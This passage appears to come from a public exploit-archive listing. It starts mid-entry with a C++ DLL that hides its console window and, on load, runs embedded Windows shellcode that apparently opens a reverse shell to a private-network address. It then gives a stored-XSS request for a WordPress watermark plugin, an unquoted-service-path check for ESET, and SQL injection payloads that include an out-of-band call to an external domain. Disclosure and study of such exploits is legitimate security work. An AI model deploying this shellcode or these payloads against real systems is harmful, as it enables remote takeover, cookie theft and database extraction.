/>"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"<br />"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"<br />"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"<br />"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"<br />"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"<br />"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"<br />"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"<br />"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"<br />"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"<br />"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"<br />"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"<br />"\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"<br />"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00"<br />"\x00\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\x6d"<br />"\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"<br />"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29"<br />"\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48"<br />"\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea"<br />"\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"<br />"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81"<br />"\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00"<br />"\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0"<br />"\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01"<br />"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41"<br />"\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d"<br />"\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48"<br />"\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"<br />"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5"<br />"\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"<br />"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";<br /><br /><br />VOID shellcodeExecute() {<br /> ShowWindow(GetConsoleWindow(), SW_HIDE);<br /><br /> HANDLE mem_handle = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(shellcode), NULL);<br /><br /> void* mem_map = MapViewOfFile(mem_handle, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0x0, 0x0, sizeof(shellcode));<br /><br /> std::memcpy(mem_map, shellcode, sizeof(shellcode));<br /><br /> std::cout << ((int(*)())mem_map)() << std::endl;<br />}<br /><br />BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)<br />{<br /> switch (fdwReason)<br /> {<br /> case DLL_PROCESS_ATTACH:<br /> shellcodeExecute();<br /> break;<br /> case DLL_THREAD_ATTACH:<br /> break;<br /> case DLL_THREAD_DETACH:<br /> break;<br /> case DLL_PROCESS_DETACH:<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)<br /># Date: 22 March 2024<br /># Exploit Author: Erdemstar<br /># Vendor: https://wordpress.com/<br /># Version: 1.3.1<br /><br /># Proof Of Concept:<br />1. Click Add New Watermark and enter the XSS payload into the Watermark Text.<br />2. Stored XSS will run on anyone who wants to edit this page.<br /><br /># Vulnerable Property: watermark_title<br /># PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp<br /># Request:<br />POST /wp-admin/post.php HTTP/2<br />Host: erdemstar.local<br />Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22f539fc8630599f2503d02a6c1a7e678; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wp-settings-time-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7Cdae14d9d9aa7f0c4df03783bb2bd321a5b3d6a63d8c3e1ae131dda689c595862; wp-settings-time-5=1711124723<br />Content-Length: 1460<br />Upgrade-Insecure-Requests: 1<br />Origin: https://erdemstar.local<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Referer: https://erdemstar.local/wp-admin/post-new.php?post_type=watermark&wp-post-new-reload=true<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Priority: u=0, i<br /><br />_wpnonce=99a1d1e63a&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dwatermark&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=watermark&original_post_status=auto-draft&referredby=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&_wp_original_http_referer=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&auto_draft=1&post_ID=35&meta-box-order-nonce=ea875c0c6f&closedpostboxesnonce=d29be25ad8&post_title=&samplepermalinknonce=1e667edd3a&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=03&jj=22&aa=2024&hh=16&mn=25&ss=23&hidden_mm=03&cur_mm=03&hidden_jj=22&cur_jj=22&hidden_aa=2024&cur_aa=2024&hidden_hh=16&cur_hh=16&hidden_mn=25&cur_mn=25&original_publish=Publish&publish=Publish&tax_input%5BCategories%5D%5B%5D=0&post_name=&custom_meta_box_nonce=d1322f94a0&watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&img_sizes%5B%5D=thumbnail&img_sizes%5B%5D=medium&img_sizes%5B%5D=large&img_sizes%5B%5D=full&txt_type=ARIAL.TTF&rgb=38%2C1%2C24&txt_size=8&color=%23260118&rotation=&opicity=100&position=top&destance_x=&mesaure_x=px&padding=&mesaure_y=px&background=yes&rgb_bg=255%2C0%2C0&bg_destance_x=&bg_padding=&color_bg=%23ff0000&image=&img_rotation=&img_opicity=100&img_position=top&img_size=4&img_destance_x=&img_mesaure_x=px&img_padding=&img_mesaure_y=px<br /> <br /><br /><br /></code></pre>
<pre><code># Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Exploit Date: 2024-04-01<br /># Vendor : https://www.eset.com<br /># Version : 17.0.16.0<br /># Tested on OS: Microsoft Windows 10 pro x64<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"<br />|findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET<br />Security\ekrn.exe<br /><br />C:\>sc qc ekrn<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ekrn<br /> TYPE : 20 WIN32_SHARE_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"<br /> LOAD_ORDER_GROUP : Base<br /> TAG : 0<br /> DISPLAY_NAME : ESET Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\>systeminfo<br /><br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19045 N/A Build 19045<br />OS Manufacturer: Microsoft Corporation<br /></code></pre>
<pre><code># Title: Computer Laboratory Management System v1.0 - Multiple-SQLi<br /># Author: nu11secur1ty<br /># Date: 03/28/2024<br /># Vendor: https://github.com/oretnom23<br /># Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400<br /># Reference: https://portswigger.net/web-security/sql-injection<br /><br /># Description:<br />The id parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'<br />was submitted in the id parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed. The attacker can get all information from the system by<br />using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN<br />(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=user/manage_user&id=7''' AND (SELECT 1734<br />FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT<br />(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM<br />(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 11 columns<br /> Payload: page=user/manage_user&id=-2854' UNION ALL SELECT<br />NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#<br />---<br /><br /><br /></code></pre>